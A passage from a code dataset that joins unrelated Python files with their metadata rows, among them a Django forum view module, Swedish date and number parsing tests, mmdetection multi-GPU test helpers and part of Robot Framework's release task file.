# A helper function - needed for test_with_multiprocessing()
# Can't be defined inside the test because multiprocessing needs
# everything to be in __main__
assert isinstance(x, affine.Affine)
return x
def test_with_multiprocessing():
a1 = affine.Affine(1, 2, 3, 4, 5, 6)
a2 = affine.Affine(6, 5, 4, 3, 2, 1)
results = Pool(2).map(_mp_proc, [a1, a2])
for expected, actual in zip([a1, a2], results):
assert expected == actual
| Lxml_requests/source/affine/tests/test_pickle.py | 744 | Validate that instances of `affine.Affine()` can be pickled and unpickled.
A helper function - needed for test_with_multiprocessing() Can't be defined inside the test because multiprocessing needs everything to be in __main__ | 227 | en | 0.833897 |
# -*- coding: utf-8 -*-
"""
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
"""
from __future__ import absolute_import
from binascii import hexlify
from gevent.event import AsyncResult
from gevent.queue import Queue
from zeronimo.exceptions import TaskClosed
from zeronimo.helpers import make_repr
from zeronimo.messaging import BREAK, DONE, RAISE, RETURN, YIELD
__all__ = ['RemoteResult', 'RemoteException', 'RemoteIterator']
class RemoteResult(AsyncResult):
"""The task object.
    :param collector: the collector that gathers replies for this task.
    :param call_id: the identifier of the call which spawned this task.
    :param task_id: the task identifier.
:param worker_info: the value the worker sent at accepting.
"""
def __init__(self, collector, call_id, task_id, worker_info=None):
super(RemoteResult, self).__init__()
self.collector = collector
self.call_id = call_id
self.task_id = task_id
self.worker_info = worker_info
def close(self):
"""Stops to collect replies from its task."""
self.set_exception(TaskClosed)
self.collector.remove_result(self)
# iterator
_iterator = False
def is_iterator(self):
return self._iterator
def set_iterator(self):
self._iterator = True
self.set(RemoteIterator())
# exception
def set_remote_exception(self, remote_exc_info):
"""Raises an exception as a :exc:`RemoteException`."""
exc_type, exc_str, filename, lineno = remote_exc_info[:4]
exc_type = RemoteException.compose(exc_type)
exc = exc_type(exc_str, filename, lineno, self.worker_info)
if len(remote_exc_info) > 4:
state = remote_exc_info[4]
exc.__setstate__(state)
self.set_exception(exc)
def set_exception(self, exc):
if self.is_iterator():
self.get().throw(exc)
else:
super(RemoteResult, self).set_exception(exc)
# reply receivers
def set_reply(self, method, value):
if method == RETURN:
self._return(value)
elif method == YIELD:
self._yield(value)
elif method == RAISE:
self._raise(value)
elif method == BREAK:
self._break(value)
if method & DONE:
self.collector.remove_result(self)
def _return(self, value):
self.set(value)
def _yield(self, value):
if not self.is_iterator():
self.set_iterator()
self.get().send(value)
def _raise(self, value):
self.set_remote_exception(value)
def _break(self, value):
if self.is_iterator():
self.get().close()
else:
self.set(iter([]))
def __repr__(self):
return make_repr(self, None, ['call_id', 'task_id', 'worker_info'],
reprs={'call_id': hexlify, 'task_id': hexlify})
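# Consumption sketch: after a worker streams YIELD replies, ``result.get()``
# returns the RemoteIterator installed above, so a (hypothetical) caller can do:
#
#   for value in result.get():
#       handle(value)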
class RemoteException(BaseException):
_composed = {}
@classmethod
def compose(cls, exc_type):
try:
return cls._composed[exc_type]
except KeyError:
class composed_exc_type(exc_type, cls):
__init__ = cls.__init__
composed_exc_type.exc_type = exc_type
composed_exc_type.exctype = exc_type # For backward compatibility.
composed_exc_type.__name__ = exc_type.__name__ + '(Remote)'
# Avoid to start with dot in traceback.
composed_exc_type.__module__ = 'exceptions'
cls._composed[exc_type] = composed_exc_type
return composed_exc_type
def __init__(self, message, filename=None, lineno=None, worker_info=None):
super(RemoteException, self).__init__(message)
self.filename = filename
self.lineno = lineno
self.worker_info = worker_info
def __str__(self):
string = super(RemoteException, self).__str__()
if self.filename is not None:
string += ' ({0}:{1})'.format(self.filename, self.lineno)
return string
class RemoteIterator(object):
def __init__(self):
self.queue = Queue()
def __iter__(self):
return self
def send(self, value):
if self.queue is None:
raise StopIteration
self.queue.put((True, value))
def throw(self, exc):
if self.queue is None:
raise StopIteration
self.queue.put((False, exc))
def close(self):
self.throw(StopIteration)
def __next__(self):
if self.queue is None:
raise StopIteration
yields, value = self.queue.get()
if yields:
return value
else:
self.queue = None
raise value
next = __next__ # for Python 2
| zeronimo/results.py | 4,844 | The task object.
:param collector: the collector that gathers replies for this task.
:param call_id: the identifier of the call which spawned this task.
:param task_id: the task identifier.
:param worker_info: the value the worker sent at accepting.
Stops collecting replies from its task.
Raises an exception as a :exc:`RemoteException`.
zeronimo.results
~~~~~~~~~~~~~~~~
:copyright: (c) 2013-2017 by Heungsub Lee
:license: BSD, see LICENSE for more details.
| 570 | en | 0.787522 |
from forums.models import Forum, Comment
from django.views import View
from django.views import generic
from django.shortcuts import render, get_object_or_404, redirect
from django.urls import reverse
from django.contrib.auth.mixins import LoginRequiredMixin
from forums.forms import CommentForm
from myarts.owner import OwnerListView, OwnerDetailView, OwnerCreateView, OwnerUpdateView, OwnerDeleteView
class ForumListView(OwnerListView):
model = Forum
template_name = "forums/list.html"
class ForumDetailView(OwnerDetailView):
model = Forum
template_name = "forums/detail.html"
def get(self, request, pk) :
x = get_object_or_404(Forum, id=pk)
comments = Comment.objects.filter(forum=x).order_by('-updated_at')
comment_form = CommentForm()
context = { 'forum' : x, 'comments': comments, 'comment_form': comment_form }
return render(request, self.template_name, context)
class ForumCreateView(OwnerCreateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumUpdateView(OwnerUpdateView):
model = Forum
fields = ['title', 'text']
template_name = "forums/form.html"
class ForumDeleteView(OwnerDeleteView):
model = Forum
template_name = "forums/delete.html"
class CommentCreateView(LoginRequiredMixin, View):
def post(self, request, pk) :
f = get_object_or_404(Forum, id=pk)
comment = Comment(text=request.POST['comment'], owner=request.user, forum=f)
comment.save()
return redirect(reverse('forums:forum_detail', args=[pk]))
class CommentDeleteView(OwnerDeleteView):
model = Comment
template_name = "forums/comment_delete.html"
# https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id
def get_success_url(self):
forum = self.object.forum
return reverse('forums:forum_detail', args=[forum.id])
| forums/views.py | 1,948 | https://stackoverflow.com/questions/26290415/deleteview-with-a-dynamic-success-url-dependent-on-id | 98 | en | 0.738848 |
#!/usr/bin/env python
"""Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
"""
__all__ = ["parseKeyValueData"]
from .GetKeyword import getKeyword
from .GetValues import getValues
import opscore.RO.Alg
def parseKeyValueData(astr):
"""Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
"""
dataDict = opscore.RO.Alg.OrderedDict()
if astr == '':
return dataDict
nextInd = 0
while nextInd is not None:
keyword, nextInd = getKeyword(astr, nextInd)
# print "got keyword %r; nextInd = %r" % (keyword, nextInd)
valueTuple, nextInd = getValues(astr, nextInd)
# print "got valueTuple %r; nextInd = %r" % (valueTuple, nextInd)
dataDict[keyword] = valueTuple
return dataDict
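# Illustration (value types come from getValues, per the docstring above):
#   parseKeyValueData("genSet=1, 2.5, 'str'; noValKey")
#   would return OrderedDict([('genSet', (1, 2.5, 'str')), ('noValKey', ())])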
if __name__ == '__main__':
# perform test
print("testing parseHubMsg\n")
testList = [
"keyword",
"",
"strSet='quoted \"string\" 1', 'quoted \"string\" 2', unquotedstr3",
"genSet=1, 2, 3.14159, 'str4', 'str5'",
"noValKey1=",
"noValKey1",
"noValKey1; intKey2=2; noValKey3=; noValKey4 = ; noValKey5",
]
for astr in testList:
try:
dataDict = parseKeyValueData(astr)
print("parseHubMsg(%r) = {" % (astr,))
for key, value in dataDict.items():
print(" %r: %r" % (key, value))
print("}")
except Exception as e:
print("failed with error: ", e)
| python/opscore/RO/ParseMsg/ParseData.py | 3,168 | Parses a string of the form:
'keyword1=value11, value12,...; keyword2=value21, value22; keyword3=; keyword4; ...'
returning an opscore.RO.Alg.OrderedDict of the form:
{keyword1:(value11, value12,...), keyword2:(value21, value22, ...),
keyword3: (), keyword4: (), ...}
Inputs:
- astr: the string to parse, of the form:
keyword1=value11, value12,...; keyword2=value21, value22...
where:
- keyword is a keyword; it must start with a letter or underscore
and may contain those characters or digits thereafter.
- value is the value of the keyword, one of:
an integer
a floating point number
a string delimited by a pair of single or double quotes
any enclosed characters identical to the delimiter
should be escaped by doubling or preceding with a backslash
- Each keyword may have zero or more comma-separated values;
if it has zero values then the equals sign may be omitted.
Returns dataDict, an opscore.RO.Alg.OrderedDict of keyword: valueTuple entries,
one for each keyword. Details:
- The keywords are given in the order they were specified in the message.
- If the keyword has no values, valueTuple is ()
- If the keyword has one value, valueTuple is (value,)
Parse a keyword-value message.
History:
2002-12-16 ROwen
2003-06-25 ROwen Modified to return an opscore.RO.Alg.OrderedDict
2003-11-19 ROwen Modified header: keywords with no values may have an '='.
Added "noValKey=" to test cases as it caused an infinite loop.
2004-05-18 ROwen Modified test code to use astr instead of str.
2014-09-17 ROwen Modified to test for Exception instead of StandardError
2015-11-03 ROwen Replace "!= None" with "is not None" to modernize the code.
| 1,884 | en | 0.642889 |
# -*- coding: utf-8 -*-
#
# Copyright 2017 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from datetime import datetime, time
from lingua_franca.parse import extract_datetime
from lingua_franca.parse import extract_number
from lingua_franca.parse import normalize
class TestNormalize(unittest.TestCase):
def test_extractnumber_sv(self):
self.assertEqual(extract_number("1 och en halv deciliter",
lang='sv-se'), 1.5)
self.assertEqual(extract_number("det här är det första testet",
lang='sv-se'), 1)
self.assertEqual(extract_number("det här är test nummer 2",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är det andra testet",
lang='sv-se'), 2)
self.assertEqual(extract_number("det här är tredje testet",
lang='sv-se'), 3)
self.assertEqual(extract_number("det här är test nummer 4",
lang='sv-se'), 4)
self.assertEqual(extract_number("en tredjedels dl",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("tre deciliter",
lang='sv-se'), 3)
self.assertEqual(extract_number("1/3 deciliter",
lang='sv-se'), 1.0 / 3.0)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("1/4 dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("en kvarts dl",
lang='sv-se'), 0.25)
self.assertEqual(extract_number("2/3 dl",
lang='sv-se'), 2.0 / 3.0)
self.assertEqual(extract_number("3/4 dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("1 och 3/4 dl",
lang='sv-se'), 1.75)
self.assertEqual(extract_number("tre fjärdedels dl",
lang='sv-se'), 3.0 / 4.0)
self.assertEqual(extract_number("trekvarts kopp",
lang='sv-se'), 3.0 / 4.0)
def test_extractdatetime_sv(self):
def extractWithFormat(text):
date = datetime(2017, 6, 27, 0, 0)
[extractedDate, leftover] = extract_datetime(text, date,
lang='sv-se')
extractedDate = extractedDate.strftime("%Y-%m-%d %H:%M:%S")
return [extractedDate, leftover]
def testExtract(text, expected_date, expected_leftover):
res = extractWithFormat(text)
self.assertEqual(res[0], expected_date)
self.assertEqual(res[1], expected_leftover)
testExtract("Planera bakhållet 5 dagar från nu",
"2017-07-02 00:00:00", "planera bakhållet")
testExtract("Vad blir vädret i övermorgon?",
"2017-06-29 00:00:00", "vad blir vädret")
testExtract("Påminn mig klockan 10:45",
"2017-06-27 10:45:00", "påminn mig klockan")
testExtract("vad blir vädret på fredag morgon",
"2017-06-30 08:00:00", "vad blir vädret")
testExtract("vad blir morgondagens väder",
"2017-06-28 00:00:00", "vad blir väder")
testExtract("påminn mig att ringa mamma om 8 veckor och 2 dagar",
"2017-08-24 00:00:00", "påminn mig att ringa mamma om och")
testExtract("Spela Kurt Olssons musik 2 dagar från Fredag",
"2017-07-02 00:00:00", "spela kurt olssons musik")
testExtract("vi möts 20:00",
"2017-06-27 20:00:00", "vi möts")
def test_extractdatetime_default_sv(self):
default = time(9, 0, 0)
anchor = datetime(2017, 6, 27, 0, 0)
res = extract_datetime('påminn mig att klippa mig på fredag',
anchor, lang='sv-se', default_time=default)
self.assertEqual(default, res[0].time())
def test_numbers(self):
self.assertEqual(normalize("det här är ett ett två tre test",
lang='sv-se'),
"det här är 1 1 2 3 test")
self.assertEqual(normalize(" det är fyra fem sex test",
lang='sv-se'),
"det är 4 5 6 test")
self.assertEqual(normalize("det är sju åtta nio test",
lang='sv-se'),
"det är 7 8 9 test")
self.assertEqual(normalize("det är tio elva tolv test",
lang='sv-se'),
"det är 10 11 12 test")
self.assertEqual(normalize("det är arton nitton tjugo test",
lang='sv-se'),
"det är 18 19 20 test")
if __name__ == "__main__":
unittest.main()
| test/test_parse_sv.py | 5,778 | -*- coding: utf-8 -*- Copyright 2017 Mycroft AI Inc. Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 573 | en | 0.857543 |
# -----------------------------------------------------
# File: temperature.py
# Author: Tanner L
# Date: 09/20/19
# Desc: Temperature sensor communication
# Inputs:
# Outputs: temperature
# -----------------------------------------------------
import threading as th
import logging
import time
import interface
import adafruit_dht # import library for temperature sensor
import board
# -----------------------------------------------------
# Function: class - temperatureThread
# Author: Tanner L
# Date: 10/10/19
# Desc: Adjusts gps values based on settings for display
# Inputs:
# Outputs:
# -----------------------------------------------------
class TemperatureThread(th.Thread):
def __init__(self):
th.Thread.__init__(self)
logging.info('--------------------TEMPERATURE START----------------------------')
self.go = True
# -----------------------------------------------------
# Function: run
# Author: Tanner L
# Date: 10/10/19
# Desc: Loop for temperatureThread, gets temperature from sensor
# Inputs:
# Outputs:
# -----------------------------------------------------
def run(self):
sensor = adafruit_dht.DHT11(board.D16) # setup dht11 to be read
while self.go:
try:
interface.temperature_queue = sensor.temperature # read in temperature
            except Exception:  # adafruit_dht raises RuntimeError on failed reads; retry on the next loop
logging.error('Temperature Sensor Error')
print('Temp Read Error')
            if interface.temperature_queue <= 0:
                time.sleep(1)  # no valid reading yet; retry every second
            else:
                time.sleep(10)  # valid reading; send a new temperature every 10 seconds
# -----------------------------------------------------
# Function: stop_thread
# Author: Tanner L
# Date: 10/10/19
# Desc: Stops thread for shutdown
# -----------------------------------------------------
def stop_thread(self): # used to kill thread
self.go = False
| byke_interface/temperature.py | 1,959 | File: temperature.py; Author: Tanner L; Date: 09/20/19; Desc: Temperature sensor communication; Outputs: temperature | 1,042 | en | 0.440015 |
# calculator example using while and if
giriş = """
(1) topla
(2) çıkar
(3) çarp
(4) böl
(5) karesini hesapla
(6) karekök hesapla
(7) cikis
"""
print(giriş)
while True:
soru = int(input("Yapmak istediğiniz işlemin numarasını girin : "))
if soru == 7:
print("çıkılıyor...")
break
elif soru == 1:
sayı1 = int(input("Toplama işlemi için ilk sayıyı girin : "))
sayı2 = int(input("Toplama işlemi için ikinci sayıyı girin : "))
print(sayı1, "+", sayı2, "=", sayı1 + sayı2)
elif soru == 2:
sayı3 = int(input("Çıkarma işlemi için ilk sayıyı girin : "))
sayı4 = int(input("Çıkarma işlemi için ikinci sayıyı girin : "))
print(sayı3, "-", sayı4, "=", sayı3 - sayı4)
elif soru == 3:
sayı5 = int(input("Çarpma işlemi için ilk sayıyı girin : "))
sayı6 = int(input("Çarpma işlemi için ikinci sayıyı girin : "))
print(sayı5, "x", sayı6, "=", sayı5 * sayı6)
elif soru == 4:
sayı7 = int(input("Bölme işlemi için ilk sayıyı girin : "))
sayı8 = int(input("Bölme işlemi için ikinci sayıyı girin : "))
print(sayı7, "/", sayı8, "=", sayı7 / sayı8)
elif soru == 5:
sayı9 = int(input("Karesini hesaplamak istediğiniz sayıyı girin : "))
print(sayı9, "sayısının karesi = ", sayı9 ** 2)
elif soru == 6:
sayı10 = int(input("Karekökünü hesaplamak istediğiniz sayıyı girin: "))
print(sayı10, "sayısının karekökü = ", sayı10 ** 0.5)
else:
print("Yanlış giriş.")
print("Aşağıdaki seçeneklerden birini giriniz :", giriş)
| 04-hesap-makinesi.py | 1,754 | calculator example with while and if | 37 | tr | 0.647911 |
import os.path as osp
import pickle
import shutil
import tempfile
import time
import mmcv
import torch
import torch.distributed as dist
from mmcv.image import tensor2imgs
from mmcv.runner import get_dist_info
from mmdet.core import encode_mask_results
def single_gpu_test(model,
data_loader,
show=False,
out_dir=None,
show_score_thr=0.3):
model.eval()
results = []
dataset = data_loader.dataset
prog_bar = mmcv.ProgressBar(len(dataset))
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
batch_size = len(result)
if show or out_dir:
if batch_size == 1 and isinstance(data['img'][0], torch.Tensor):
img_tensor = data['img'][0]
else:
img_tensor = data['img'][0].data[0]
img_metas = data['img_metas'][0].data[0]
imgs = tensor2imgs(img_tensor, **img_metas[0]['img_norm_cfg'])
assert len(imgs) == len(img_metas)
for i, (img, img_meta) in enumerate(zip(imgs, img_metas)):
h, w, _ = img_meta['img_shape']
img_show = img[:h, :w, :]
ori_h, ori_w = img_meta['ori_shape'][:-1]
img_show = mmcv.imresize(img_show, (ori_w, ori_h))
if out_dir:
out_file = osp.join(out_dir, img_meta['ori_filename'])
else:
out_file = None
model.module.show_result(
img_show,
result[i],
show=show,
out_file=out_file,
score_thr=show_score_thr)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
for _ in range(batch_size):
prog_bar.update()
return results
def multi_gpu_test(model, data_loader, tmpdir=None, gpu_collect=False):
"""Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
"""
model.eval()
results = []
dataset = data_loader.dataset
rank, world_size = get_dist_info()
if rank == 0:
prog_bar = mmcv.ProgressBar(len(dataset))
time.sleep(2) # This line can prevent deadlock problem in some cases.
for i, data in enumerate(data_loader):
with torch.no_grad():
result = model(return_loss=False, rescale=True, **data)
# encode mask results
if isinstance(result[0], tuple):
result = [(bbox_results, encode_mask_results(mask_results))
for bbox_results, mask_results in result]
results.extend(result)
if rank == 0:
batch_size = len(result)
for _ in range(batch_size * world_size):
prog_bar.update()
# collect results from all ranks
if gpu_collect:
results = collect_results_gpu(results, len(dataset))
else:
results = collect_results_cpu(results, len(dataset), tmpdir)
return results
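# Usage sketch (hypothetical distributed launch): each rank calls this on a
# model wrapped in mmcv.parallel.MMDistributedDataParallel; only rank 0 gets
# the gathered result list back:
#
#   results = multi_gpu_test(model, data_loader, gpu_collect=True)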
def collect_results_cpu(result_part, size, tmpdir=None):
rank, world_size = get_dist_info()
# create a tmp dir if it is not specified
if tmpdir is None:
MAX_LEN = 512
# 32 is whitespace
dir_tensor = torch.full((MAX_LEN,),
32,
dtype=torch.uint8,
device='cuda')
if rank == 0:
mmcv.mkdir_or_exist('.dist_test')
tmpdir = tempfile.mkdtemp(dir='.dist_test')
tmpdir = torch.tensor(
bytearray(tmpdir.encode()), dtype=torch.uint8, device='cuda')
dir_tensor[:len(tmpdir)] = tmpdir
dist.broadcast(dir_tensor, 0)
tmpdir = dir_tensor.cpu().numpy().tobytes().decode().rstrip()
else:
mmcv.mkdir_or_exist(tmpdir)
# dump the part result to the dir
mmcv.dump(result_part, osp.join(tmpdir, f'part_{rank}.pkl'))
dist.barrier()
# collect all parts
if rank != 0:
return None
else:
# load results of all parts from tmp dir
part_list = []
for i in range(world_size):
part_file = osp.join(tmpdir, f'part_{i}.pkl')
part_list.append(mmcv.load(part_file))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
# remove tmp dir
shutil.rmtree(tmpdir)
return ordered_results
def collect_results_gpu(result_part, size):
rank, world_size = get_dist_info()
# dump result part to tensor with pickle
part_tensor = torch.tensor(
bytearray(pickle.dumps(result_part)), dtype=torch.uint8, device='cuda')
# gather all result part tensor shape
shape_tensor = torch.tensor(part_tensor.shape, device='cuda')
shape_list = [shape_tensor.clone() for _ in range(world_size)]
dist.all_gather(shape_list, shape_tensor)
# padding result part tensor to max length
shape_max = torch.tensor(shape_list).max()
part_send = torch.zeros(shape_max, dtype=torch.uint8, device='cuda')
part_send[:shape_tensor[0]] = part_tensor
part_recv_list = [
part_tensor.new_zeros(shape_max) for _ in range(world_size)
]
# gather all result part
dist.all_gather(part_recv_list, part_send)
if rank == 0:
part_list = []
for recv, shape in zip(part_recv_list, shape_list):
part_list.append(
pickle.loads(recv[:shape[0]].cpu().numpy().tobytes()))
# sort the results
ordered_results = []
for res in zip(*part_list):
ordered_results.extend(list(res))
# the dataloader may pad some samples
ordered_results = ordered_results[:size]
return ordered_results
| mmdetection/mmdet/apis/test.py | 6,825 | Test model with multiple gpus.
This method tests model with multiple gpus and collects the results
under two different modes: gpu and cpu modes. By setting 'gpu_collect=True'
it encodes results to gpu tensors and use gpu communication for results
collection. On cpu mode it saves the results on different gpus to 'tmpdir'
and collects them by the rank 0 worker.
Args:
model (nn.Module): Model to be tested.
data_loader (nn.Dataloader): Pytorch data loader.
tmpdir (str): Path of directory to save the temporary results from
different gpus under cpu mode.
gpu_collect (bool): Option to use either gpu or cpu to collect results.
Returns:
list: The prediction results.
| 1,229 | en | 0.774713 |
"""
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license
"""
from toxopy import fwarnings, trials
import pandas as pd
import seaborn as sns
import matplotlib.pyplot as plt
def dlcboxplot(file,
variable,
ylab,
comparison,
jitter=False,
colors=False,
title=False,
save=False,
output_dir=None):
"""
file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
"""
df = pd.read_csv(file)
tls = trials()
new = ['FT', 'ALONE1', 'SALINE1', 'ALONE2', 'URINE1',
'ALONE3', 'SALINE2', 'ALONE4', 'URINE2', 'ALONE5']
if variable == 'distance':
df = df[(df['trial'].isin(tls[0::2]))]
d = {}
for i, j in zip(new, tls):
d[j] = i
df = df.replace(d)
df = df[df['var'] == variable]
sns.set(style='ticks', font_scale=1)
plt.figure(figsize=(13, 5), dpi=100)
if comparison == 'infection_status':
test, control = 'Infected', 'Control'
comparing = 'infection_status'
legend = 'Infection Status'
elif comparison == 'indoor_outdoor_status':
test, control = 'Indoor-outdoor', 'Indoor'
comparing = 'indoor_outdoor_status'
legend = 'Indoor-outdoor Status'
if colors is False:
my_pal = {control: '#00FFFF', test: '#E60E3C'}
else:
my_pal = {control: colors[0], test: colors[1]}
ax = sns.boxplot(x='trial',
y='value',
data=df,
hue=comparing,
palette=my_pal)
if jitter is True:
sns.stripplot(x='trial',
y='value',
data=df,
color='black',
size=3,
jitter=1)
if variable != 'distance':
for i in range(len(df['trial'].unique())-1):
if variable == 'vel':
plt.vlines(i+.5, 10, 45, linestyles='solid',
colors='black', alpha=0.2)
elif variable == 'cat_distance':
plt.vlines(i+.5, 0, 1.3, linestyles='solid',
colors='black', alpha=0.2)
if title is not False:
plt.title(title, fontsize=12)
else:
pass
ax.set_xlabel('Trial', fontsize=12)
ax.set_ylabel(ylab, fontsize=12)
ax.legend(title=legend)
plt.legend(title=legend)
'''add significance bars and asterisks between boxes.
[first pair, second pair], ..., [|, –], ...'''
if variable == 'vel':
l = [[7.75, 5.75], [8.25, 6.25], [26, 28], [31, 33]]
elif variable == 'cat_distance':
l = [[7.75, 5.75], [8.25, 6.25], [0.85, 0.9], [0.95, 1]]
for x1, x2, y1, y2 in zip(l[0], l[1], l[2], l[3]):
sig = plt.plot([x1, x1, x2, x2], [y1, y2, y2, y1],
linewidth=1,
color='k')
plt.text((x1 + x2) * .5, y2 + 0, "*",
ha='center', va='bottom', fontsize=18)
plt.show()
fig = ax.get_figure()
if save is True:
def sav(myString):
return fig.savefig(myString,
bbox_inches='tight',
dpi=100,
pad_inches=0.1)
if output_dir is not None:
sav(f'{output_dir}/{variable}.png')
else:
sav(f'{variable}.png')
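# Usage sketch (the y-axis label here is illustrative):
#   dlcboxplot('dlc_all_avgs_updated.csv', 'vel', 'Velocity',
#              'infection_status', jitter=True)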
| toxopy/dlcboxplot.py | 3,718 | file is typically 'dlc_all_avgs_updated.csv'
variable is either 'cat_ditance' or 'vel'
ylab is the y-axis label
colors is a list of two colors (e.g., ["#0062FF", "#DB62FF"])
output_dir to save the plot in a specific dir when save is True
Toxopy (https://github.com/bchaselab/Toxopy)
© M. Alyetama, University of Nebraska at Omaha
Licensed under the terms of the MIT license | 373 | en | 0.780567 |
import logging
import pytest
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import kornia as kornia
logger = logging.getLogger(__name__)
class TestIntegrationFocalLoss:
# optimization
thresh = 1e-1
lr = 1e-3
num_iterations = 1000
num_classes = 2
# focal loss
alpha = 2.0
gamma = 2.0
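    # Focal loss down-weights well-classified examples; the usual formulation is
    #   FL(p_t) = -alpha * (1 - p_t) ** gamma * log(p_t)
    # with the alpha and gamma values set above.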
def generate_sample(self, base_target, std_val=0.1):
target = base_target.float() / base_target.max()
noise = std_val * torch.rand(1, 1, 6, 5)
return target + noise
@staticmethod
def init_weights(m):
if isinstance(m, nn.Conv2d):
torch.nn.init.xavier_uniform_(m.weight)
def test_conv2d_relu(self):
# we generate base sample
target = torch.LongTensor(1, 6, 5).fill_(0)
for i in range(1, self.num_classes):
target[..., i:-i, i:-i] = i
m = nn.Sequential(
nn.Conv2d(1, self.num_classes, kernel_size=3, padding=1),
nn.ReLU(True),
)
m.apply(self.init_weights)
optimizer = optim.Adam(m.parameters(), lr=self.lr)
criterion = kornia.losses.FocalLoss(
alpha=self.alpha, gamma=self.gamma, reduction='mean')
# NOTE: uncomment to compare against vanilla cross entropy
# criterion = nn.CrossEntropyLoss()
for iter_id in range(self.num_iterations):
sample = self.generate_sample(target)
output = m(sample)
loss = criterion(output, target)
logger.debug("Loss: {}".format(loss.item()))
optimizer.zero_grad()
loss.backward()
optimizer.step()
sample = self.generate_sample(target)
output_argmax = torch.argmax(m(sample), dim=1)
logger.debug("Output argmax: \n{}".format(output_argmax))
# TODO(edgar): replace by IoU or find a more stable solution
# for this test. The issue is that depending on
# the seed to initialize the weights affects the
# final results and slows down the convergence of
# the algorithm.
val = F.mse_loss(output_argmax.float(), target.float())
if not val.item() < self.thresh:
pytest.xfail("Wrong seed or initial weight values.")
| test/integration/test_focal.py | 2,336 | | 405 | en | 0.838931 |
"""Tasks to help Robot Framework packaging and other development.
Executed by Invoke <http://pyinvoke.org>. Install it with `pip install invoke`
and run `invoke --help` and `invoke --list` for details how to execute tasks.
See BUILD.rst for packaging and releasing instructions.
"""
from pathlib import Path
from urllib.request import urlretrieve
import os
import shutil
import sys
import tarfile
import tempfile
import zipfile
assert Path.cwd().resolve() == Path(__file__).resolve().parent
sys.path.insert(0, 'src')
from invoke import Exit, task
from rellu import initialize_labels, ReleaseNotesGenerator, Version
from rellu.tasks import clean
from robot.libdoc import libdoc
REPOSITORY = 'robotframework/robotframework'
VERSION_PATH = Path('src/robot/version.py')
VERSION_PATTERN = "VERSION = '(.*)'"
POM_PATH = Path('pom.xml')
POM_VERSION_PATTERN = '<version>(.*)</version>'
RELEASE_NOTES_PATH = Path('doc/releasenotes/rf-{version}.rst')
RELEASE_NOTES_TITLE = 'Robot Framework {version}'
RELEASE_NOTES_INTRO = '''
`Robot Framework`_ {version} is a new release with **UPDATE** enhancements
and bug fixes. **MORE intro stuff...**
**REMOVE reference to tracker if release notes contain all issues.**
All issues targeted for Robot Framework {version.milestone} can be found
from the `issue tracker milestone`_.
Questions and comments related to the release can be sent to the
`robotframework-users`_ mailing list or to `Robot Framework Slack`_,
and possible bugs submitted to the `issue tracker`_.
**REMOVE ``--pre`` from the next command with final releases.**
If you have pip_ installed, just run
::
pip install --pre --upgrade robotframework
